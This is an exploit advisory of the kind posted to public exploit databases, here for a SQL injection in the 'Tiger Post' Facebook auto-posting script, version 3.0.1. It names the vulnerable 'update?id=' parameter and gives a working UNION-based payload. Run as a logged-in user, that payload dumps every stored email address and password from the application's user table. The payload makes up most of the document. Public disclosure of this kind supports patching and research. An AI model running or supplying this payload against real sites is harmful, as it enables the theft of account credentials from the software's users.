# # # # # # Exploit Title: Tiger Post - Facebook Auto Post Multi Pages/Groups/Profiles v3.0.1 - SQL Injection # Google Dork: N/A # Date: 10.02.2017 # Vendor Homepage: http://vtcreators.com/ # Software Buy: https://codecanyon.net/item/tiger-post-facebook-auto-post-multi-pagesgroupsprofiles/15279075 # Demo: http://demo.vtcreators.com/tigerpost/ # Version: 3.0.1 # Tested on: Win7 x64, Kali Linux x64 # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Mail : ihsan[@]ihsan[.]net # # # # # # SQL Injection/Exploit : # Login as regular user # http://localhost/[PATH]/index.php/user_management/update?id=[SQL] # -999'+/*!50000union*/+select+1,2,3,4,group_concat(email,char(58),password),0x496873616e2053656e63616e,7,8,9,10,11,12+from+user_management-- - # Etc... # # # # # # Iranian Exploit DataBase = http://IeDb.Ir [2017-02-11]